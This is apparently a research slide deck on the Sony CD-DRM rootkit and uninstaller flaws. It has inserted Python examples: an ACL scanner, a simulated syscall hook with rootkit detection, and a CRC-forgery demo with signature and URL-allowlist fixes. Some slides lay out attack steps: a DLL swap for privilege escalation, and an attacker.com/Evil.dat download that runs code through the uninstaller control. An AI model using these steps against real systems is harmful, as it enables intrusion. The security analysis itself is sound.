1. Lessons from the Sony CD-DRM Episode
J. Alex Halderman and Edward W. Felten
Center for Information Technology Policy, Department of Computer Science, Princeton University

2. The "Episode", Fall 2005
- World's second largest music company
- Major anti-piracy plan, gone badly awry
- Millions of copies of dangerous software
- Hundreds of thousands of PCs at risk
- International protests, class-action suits
- Multi-million dollar recall, settlements
- Changed perceptions of DRM: showed that it can be a security threat

3. Two DRM Vendors
- First4Internet (XCP): 52 titles, 4.7 million discs
- SunnComm (MediaMax, "Light years beyond encryption™"): 37 titles, 20 million discs

4. Research in the Blogosphere
- 27 blog posts, hundreds of comments
- Rapid collaboration with researchers (and amateurs) around the world
- Paper sections posted online while writing

5. Our Contributions
- XCP rootkit privilege escalation attack
- XCP and MediaMax uninstaller remote exploits
- MediaMax patch triggers the attack it purports to fix
- MediaMax spyware-like behaviors
- MediaMax watermark technology: analysis and attacks
- Analysis of, and holes in, active and passive CD DRM
- XCP contains GPL code to work with iPod DRM
- Analysis of CD DRM security problems in the broader context of computer security

6. CD DRM
- CD players: the disc plays normally
- Computers: restricted use, e.g. can't copy the disc, can't rip to MP3, can't use on an iPod

7. How CD DRM Works
The first time a protected CD is inserted:
1. Autorun (a normal Windows feature) executes an installer from the CD
2. The installer adds an "active protection" driver between the CD drivers and applications
3. The driver remains on the system
[Diagram: ripper/copier application on top, the protection driver inserted between it and the CD drivers, OS below]

8. How CD DRM Works (continued)
When the user tries to rip or copy a disc:
1. The protection driver checks the disc for a watermark
2. If the watermark is found, the driver blocks access to the audio
[Diagram: two copies of the driver stack; a normal CD passes through, a CD marked as protected is blocked at the protection driver]

9. Taxonomy of Attacks
- Prevent installation
  – Shift key (suppresses autorun)
  – Magic marker
  – Non-Windows OS
- Interfere with watermark detection
- Disable or remove the protection software

10. DRM Challenges Lead to Bad Behavior
DRM weaknesses prompted vendors to resort to dangerous and unethical techniques that jeopardized user security:
- XCP rootkit
- MediaMax aggressive installation
- XCP and MediaMax ActiveX-based uninstallers

11. The XCP Rootkit
- DRM challenge: users will remove active protection
- XCP's response: install a rootkit to conceal the software

12. XCP Rootkit: Discovery
Mark Russinovich, October 31, 2005

13. XCP Rootkit: Operation
- Magic prefix: $sys$
- Files, processes and registry keys whose names begin with the prefix are hidden

14. XCP Rootkit: Problems
- Local privilege escalation
  – Hidden objects are not limited to XCP's software: anything named with the prefix disappears
  – Malware run by non-privileged users can't install its own rootkit, but can use XCP's
  – Used to hide from virus checkers and admin tools
- Exploits in the wild: Backdoor.Ryknos.B, Trojan.Welomoch

15. Quotes
"Most people, I think, don't even know what a rootkit is, so why should they care about it?"
— Thomas Hesse, President, Sony BMG Global Digital Business

"It's very important to remember that it's your intellectual property — it's not your computer. And in the pursuit of protection of intellectual property, it's important not to defeat or undermine the security measures that people need to adopt in these days."
— Stewart Baker, Assistant U.S. Secretary of Homeland Security

16. MediaMax Aggressive Installer
- DRM challenge: users will decline to install the protection software
- MediaMax's response: install aggressively, regardless of consent

17. MediaMax Installation
- 13+ MB installed before the EULA screen is shown
- Commonly, active protection is permanently activated even if the EULA is declined

18. MediaMax Installation: Problem
- The installed files carry the ACL "Everyone: Full Control"
- Found by Jesse Burns and Alex Stamos, December 6, 2005

19. MediaMax Installation: Attack
1. The attacker prepares a booby-trapped MediaMax.dll with malicious code in its DllMain() function
2. A non-privileged user replaces the installed file with the attack version
3. A privileged user inserts a MediaMax CD
4. Even before displaying a EULA, the software on the CD calls into MediaMax.dll to check its version
5. The attack code runs with the privileged user's rights

20. Aggression Exacerbates Repairs
- Permissions are reset to the non-secure state whenever a disc is inserted
- Sony releases a patch, but the patch calls code in MediaMax.dll; if the file is already booby-trapped, the patch itself sets off the attack code
- How do users know they need to patch? They are vulnerable even if they refused the installation
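The precondition for the attack on slides 18 to 20 is a code module that an unprivileged user may overwrite and that privileged code later loads. The check a practitioner would run on a suspect install directory is to dump its ACLs with icacls and look for write-class rights granted to broad principals. The script below is an added example, not code from the slides or from Sony or SunnComm: it parses the text that `icacls "C:\Program Files\MediaMax" /T` prints and flags every .dll/.ocx/.sys/.exe that Everyone, Users, Authenticated Users or Interactive can modify. The icacls output, the MediaMax directory and the file names are constructed; the one format assumption is that icacls separates the path from its first ACE with a single space and indents the remaining ACEs.

```python
import re

# Principals an unprivileged local user is a member of on a default workstation.
BROAD_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}
# icacls simple rights (F, M, W) and specific rights that let a principal modify a file.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "DC", "WDAC", "WO", "GA", "GW"}
CODE_EXTENSIONS = (".dll", ".ocx", ".sys", ".exe")

PRINCIPAL = r"(?P<who>Everyone|[^\\:()]+\\[^\\:()]+)"   # Everyone or DOMAIN\name
FLAGS = r"(?P<flags>(?:\([^()]*\))+)"                   # (OI)(CI)(F), (I)(RX), (DENY)(W) ...
FILE_LINE_RE = re.compile(rf"^(?P<path>\S.*?) {PRINCIPAL}:{FLAGS}$")  # path + first ACE
ACE_LINE_RE = re.compile(rf"^{PRINCIPAL}:{FLAGS}$")                   # indented ACE

# Constructed icacls output; hypothetical paths, mirroring the "Everyone: Full Control" finding.
SAMPLE_ICACLS_OUTPUT = """\
C:\\Program Files\\MediaMax\\MediaMax.dll Everyone:(F)
                                         NT AUTHORITY\\SYSTEM:(F)
                                         BUILTIN\\Administrators:(F)
C:\\Program Files\\MediaMax\\helper.dll Everyone:(I)(RX)
                                       BUILTIN\\Users:(I)(RX)
                                       BUILTIN\\Administrators:(I)(F)
C:\\Program Files\\MediaMax\\readme.txt Everyone:(M)
Successfully processed 3 files; Failed processing 0 files
"""


def parse_icacls(text):
    """Return {path: [(principal, [flag tokens]), ...]} from icacls text."""
    acls = {}
    current = None
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("Successfully processed"):
            continue
        if raw[0].isspace():                      # continuation ACE for the current file
            match = ACE_LINE_RE.match(raw.strip())
            path = current
        else:                                     # new file: path followed by its first ACE
            match = FILE_LINE_RE.match(raw.rstrip())
            path = match.group("path") if match else None
            current = path
        if match is None or path is None:
            continue
        tokens = re.findall(r"\(([^()]*)\)", match.group("flags"))
        acls.setdefault(path, []).append((match.group("who"), tokens))
    return acls


def unprivileged_writers(aces):
    """Broad principals whose allow ACE includes a right that modifies the file."""
    writers = []
    for who, tokens in aces:
        if who.lower() not in BROAD_PRINCIPALS or "DENY" in tokens:
            continue
        rights = {r.strip() for token in tokens for r in token.split(",")}
        if rights & WRITE_RIGHTS:
            writers.append(who)
    return writers


def find_replaceable_modules(icacls_text):
    """(path, principal) pairs for code modules an ordinary user could overwrite."""
    findings = []
    for path, aces in parse_icacls(icacls_text).items():
        if path.lower().endswith(CODE_EXTENSIONS):
            findings.extend((path, who) for who in unprivileged_writers(aces))
    return sorted(findings)


if __name__ == "__main__":
    for path, who in find_replaceable_modules(SAMPLE_ICACLS_OUTPUT):
        print(f"{who} can replace {path}")
```

On the constructed sample only MediaMax.dll is reported: helper.dll grants Everyone read/execute only, and readme.txt is writable but is not a code module. A deny ACE (`(DENY)(W)`) is treated as removing the right, which is the conservative reading for this check.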

21. XCP and MediaMax Uninstallers
- DRM challenge: angry customers demand to uninstall the protection software
- XCP and MediaMax response: offer uninstallers, but use an online design to limit access

22. XCP Uninstaller: Step 1

23. XCP Uninstaller: Step 2
Wait for … (hours)

24. XCP Uninstaller: Step 3

25. XCP Uninstaller: Step 4
Wait for a second … (several days)

26. XCP Uninstaller: Step 5
Finally, visit the web page and run the uninstaller*
* But if you insert the CD again, go back to step 1!

27. XCP Uninstaller: Operation
1. The XCP uninstall web page calls CodeSupport.Uninstall("…"), passing the URL of XCP.dat
2. The client-side ActiveX control, CodeSupport.ocx, issues "HTTP GET /XCP.dat" to the server sony-bmg.com and receives XCP.dat
3. The client extracts InstallLite.dll from XCP.dat and calls its function UnInstall_xcp
Problems:
- The ActiveX control will accept an arbitrary URL
- Code fetched from that URL is not authenticated
- The control is not removed after use

28. XCP Uninstaller: Attack
1. The attacker constructs Evil.dat: creates an InstallLite.dll and puts attack code in its UnInstallXCP function
2. The victim visits the attacker's web page, which calls CodeSupport.Uninstall("…") with the attacker's URL
3. CodeSupport.ocx issues "HTTP GET /Evil.dat" to the server attacker.com and receives Evil.dat
4. The client extracts InstallLite.dll from Evil.dat and calls UnInstallXCP
5. The attack code runs with the local user's privileges

29. MediaMax Uninstaller
"Oops!... I did it again"

30. MediaMax Uninstaller: Operation
1. The MediaMax uninstall web page calls AxWebRemove.Remove(key, "…"), passing a key and a URL
2. The client-side ActiveX control, AxWebRemove.ocx, issues "GET /validate.asp?key=3984-…" to the server sunncomm.com
3. The control then issues "GET /webrem.dll" to sunncomm.com and receives WebRem.dll
4. The client calls the function ECF7() from WebRem.dll
The same online design as the XCP control, with the same problems.

31. Aftermath
- XCP discs recalled; MediaMax halted… but still in many stores and CD collections
- Major class-action suits settled
- Customers can trade discs for cash, MP3 downloads, and non-DRM versions
- Sony won't use CD DRM, for now

32. Takeaway Lessons
- Aggressive DRM can have dangerous consequences: harm to user security
- Effective DRM may require undermining the user's control of the machine, and thus the user's ability to defend against security threats
- Look for similar problems in the future

33. The Stakes are High
Bad DRM can:
- Harm users
- Create major liability for content owners
- Reduce sales for artists
- Ultimately, reduce incentives to create

34. Lessons from the Sony CD-DRM Episode (closing slide)
J. Alex Halderman and Edward W. Felten, Center for Information Technology Policy, Department of Computer Science, Princeton University

35. Chronology (2005)
- Oct. 31: Rootkit revealed
- Nov. 3: Sony releases XCP patch
- Nov. 10: First suits filed against Sony
- Nov. 14: XCP patch/uninstaller hole
- Nov. 15: Sony recalls XCP discs
- Nov. 17: MediaMax uninstaller hole
- Dec. 6: MediaMax player hole
- Dec. 7: Hole in the patch for the MediaMax player hole
- Dec. 30: First suits settled

36. XCP Rootkit: Operation (normal system call)
A normal Windows system call, e.g. listing the files in a directory: the application calls KeQueryDirectoryFile(…), the kernel looks up the entry in KeServiceDescriptorTable and jumps to its own handler.
KeServiceDescriptorTable, before XCP loads:
  KeQueryDirectoryFile      0x8060bb9c  -> Windows kernel: int KeQueryDirectoryFile(…) { … }
  KeCreateFile              0x8056b9c8
  KeQuerySystemInformation  0x805ca104
  KeEnumerateKey            0x805010d0
  KeOpenKey                 0x805c9e3c
  …
(The slides' "Ke…" names are shorthand; the actual system-service table entries are NtQueryDirectoryFile, NtCreateFile, NtQuerySystemInformation, NtEnumerateKey and NtOpenKey.)

37. XCP Rootkit: Operation (hooked)
After Aries.sys loads, the table entry for KeQueryDirectoryFile points into the rootkit instead of the kernel:
  KeQueryDirectoryFile      0xf967bfa   -> Rootkit (Aries.sys): int Rootkit_QueryDirectoryFile(…) { … if filename begins with "$sys$": remove from results }
  KeCreateFile              0x8056b9c8
  KeQuerySystemInformation  0x805ca104
  KeEnumerateKey            0x805010d0
  KeOpenKey                 0x805c9e3c
  …
The kernel's own handler at 0x8060bb9c is still present; the rootkit calls it and filters its results before returning them to the application.
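The hook on slides 36 and 37 and the privilege-escalation consequence on slides 13 and 14 can be shown together in a small simulation. The block below is an added example, not Aries.sys and not code from the slides: the system-service table is modelled as a dict, the hook replaces the directory-listing entry with a filter that drops names beginning with "$sys$", and two things are then demonstrated: an unprivileged program that cannot load its own driver still hides its file simply by adopting the prefix, and a cross-view diff between the hooked API and the raw on-disk listing reveals every hidden name, which is the technique the rootkit detectors of the period used. The directory and file names are constructed; the "raw view" is the unhooked handler, standing in for a detector that reads the file system directly.

```python
MAGIC_PREFIX = "$sys$"
SYS32 = r"C:\Windows\system32"   # constructed directory for the simulation


def fresh_system():
    """A constructed disk plus a service table that has not been hooked yet."""
    disk = {SYS32: ["kernel32.dll", "$sys$aries.sys", "notepad.exe"]}

    def raw_query_directory(path):
        # The kernel's own handler: returns what is really on disk.
        return list(disk[path])

    table = {"QueryDirectoryFile": raw_query_directory}
    return disk, table


def install_xcp_hook(table):
    """Overwrite the table entry with a filter, as Aries.sys did; return the original."""
    original = table["QueryDirectoryFile"]

    def rootkit_query_directory(path):
        # Call the real handler, then strip every name carrying the magic prefix.
        return [name for name in original(path) if not name.startswith(MAGIC_PREFIX)]

    table["QueryDirectoryFile"] = rootkit_query_directory
    return original


def list_directory(table, path):
    """What a user-mode program (Explorer, an antivirus scanner) gets back."""
    return table["QueryDirectoryFile"](path)


def cross_view_diff(table, path, raw_view):
    """Names on disk that the API view omits: the hidden objects."""
    return sorted(set(raw_view(path)) - set(list_directory(table, path)))


def demo():
    """Returns (what the API shows, what the cross-view check finds hidden)."""
    disk, table = fresh_system()
    original = install_xcp_hook(table)
    # Unprivileged malware cannot install a driver of its own, but it can create
    # a file, and the prefix makes XCP's hook hide that file for free.
    disk[SYS32].append("$sys$stealer.exe")
    visible = list_directory(table, SYS32)
    hidden = cross_view_diff(table, SYS32, original)
    return visible, hidden


if __name__ == "__main__":
    visible, hidden = demo()
    print("API view:", visible)
    print("hidden by the hook:", hidden)
```

Before the hook is installed the cross-view diff is empty; afterwards it lists both the rootkit's own file and the unprivileged malware's file, which is exactly why a name-prefix hook is a gift to every other program on the machine.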

38. Constructing Evil.dat
Archive files are protected with a proprietary CRC.
Header: Name="UninstallXCP.dat", CRC=0x03cb1a88
ActiveX control:
1. C = ComputeCRC(…)
2. If C != Header.CRC then terminate
3. Extract and execute the file
Attack:
1. Prepare Evil.dat with a random CRC
2. Run the control with a breakpoint at line 2
3. Take the computed CRC and place it in Evil.dat
Lesson: a CRC takes no secret input, so anyone can compute it. Use a digital signature!
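The following block is an added example, not CodeSupport.ocx, AxWebRemove.ocx or code from the slides. It models the archive check on this slide (a header CRC the control recomputes and compares), using zlib.crc32 as a stand-in for the vendor's proprietary CRC, forges a payload the way the slide does (compute the value the verifier expects and write it into the header), and then applies the two fixes that the uninstaller designs on slides 27 to 30 lacked: an authenticator the attacker cannot compute, and an allowlist on the URL the control will fetch from. HMAC-SHA256 under a vendor-only key stands in for the signature so that the block runs on the standard library; a shipped uninstaller cannot hold a secret, so it would embed a public key and verify an asymmetric signature instead. The archive layout, key, hostnames and payloads are constructed.

```python
import hashlib
import hmac
import struct
import zlib
from urllib.parse import urlsplit

# Assumed archive layout (not the real XCP.dat format):
# 16-byte name, 4-byte big-endian CRC32, then the payload.
NAME_LEN = 16
HEADER = struct.Struct(f">{NAME_LEN}sI")
TAG_LEN = hashlib.sha256().digest_size


def crc32(data):
    return zlib.crc32(data) & 0xFFFFFFFF


def pack_archive(name, payload, crc):
    return HEADER.pack(name.encode().ljust(NAME_LEN, b"\0"), crc) + payload


def vendor_crc_check(blob):
    """Slide 38, steps 1-2: recompute the CRC over the payload, compare to the header."""
    _name, crc = HEADER.unpack_from(blob)
    return crc32(blob[HEADER.size:]) == crc


def forge_archive(payload):
    """Attacker: the CRC has no secret input, so compute it and patch the header.
    With a proprietary CRC you would read the value off a debugger breakpoint,
    as the slide does; the principle is the same."""
    return pack_archive("UninstallXCP.dat", payload, crc32(payload))


# Fix 1: authenticate the archive with something the attacker cannot compute.
VENDOR_KEY = b"constructed-vendor-key-not-a-real-secret"   # hypothetical


def sign_archive(name, payload, key=VENDOR_KEY):
    body = pack_archive(name, payload, crc32(payload))
    return body + hmac.new(key, body, hashlib.sha256).digest()


def verify_signed(blob, key=VENDOR_KEY):
    if len(blob) < HEADER.size + TAG_LEN:
        return False
    body, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    return hmac.compare_digest(expected, tag)   # constant-time comparison


# Fix 2: only fetch from the vendor's origin, and only over TLS (hypothetical allowlist).
ALLOWED_ORIGINS = {("https", "sony-bmg.com")}


def url_allowed(url):
    parts = urlsplit(url)
    return (parts.scheme, parts.hostname) in ALLOWED_ORIGINS


def uninstall(url, blob, key=VENDOR_KEY):
    """The hardened control: refuse before any code from the archive is run."""
    if not url_allowed(url):
        return "refused: origin not allowed"
    if not verify_signed(blob, key):
        return "refused: bad signature"
    return "run"


if __name__ == "__main__":
    evil = forge_archive(b"attack code")
    print("forged archive passes the CRC check:", vendor_crc_check(evil))
    print(uninstall("http://attacker.com/Evil.dat", evil))
    print(uninstall("https://sony-bmg.com/XCP.dat", evil))
    print(uninstall("https://sony-bmg.com/XCP.dat", sign_archive("XCP.dat", b"genuine")))
```

The forged archive passes `vendor_crc_check` every time, which is the slide's point; it is refused by `uninstall` first because of its origin and, if the attacker could also control the host, because the tag under the vendor key cannot be produced without that key. The origin check is a defence in depth, not a substitute for the signature: a DNS or proxy position would defeat it on its own.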

39. CD DRM as Spyware
Both XCP and MediaMax:
- "Phone home" about each title played, despite a privacy statement to the contrary
- Ship without a meaningful uninstaller
- Install without consent, or exceed the consent given
Spyware is hard to define, but these meet most common definitions.